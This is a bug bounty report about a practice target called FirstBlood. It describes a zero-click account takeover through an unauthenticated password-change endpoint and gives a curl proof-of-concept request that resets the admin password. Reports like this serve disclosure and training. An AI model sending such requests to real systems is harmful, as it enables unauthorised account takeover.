FirstBlood-#1443Zero click account takeover
This issue was discovered on FirstBlood v3

On 2022-12-10, srb1mal Level 3 reported:

I've found a vulnerability via which the endpoint /drapi/editpassword can actually be accessed unauthenticated which leads to takeover of admin account/any account without knowing the password.

Steps to reproduce -

  1. Run the following command

    curl -i -s -k -X $'POST' \ -H $'Host:' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Dnt: 1' -H $'X-SITE-REQ: permitted' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' -H $'Te: trailers' -H $'Connection: close' -H $'Content-Length: 15' -H $'Content-Type: application/x-www-form-urlencoded' \ --data-binary $'username=admin ' \ $''

    And you'll see the response as a new password being set for the account.

Note - I hope this count as a new issue cause, This was the issue from FBV2 with the bug id "28" but it was attached with "27" bug id reports and I think this is separate from "27" where we can change the admin password without being the user.


Impact -

  1. Without knowing the password of any account, the account can be takeovered.

Thanks & Regards srb1mal


Endpoint: /drpanel/drapi/editpassword.php

Parameter: username

Payload: admin

FirstBlood ID: 52
Vulnerability Type: Auth issues

The endpoint /drpanel/drapi/editpassword.php still allows an unauthenticated user to modify the password of any account if the username is known. The username was renamed from previous versions from drAdmin to admin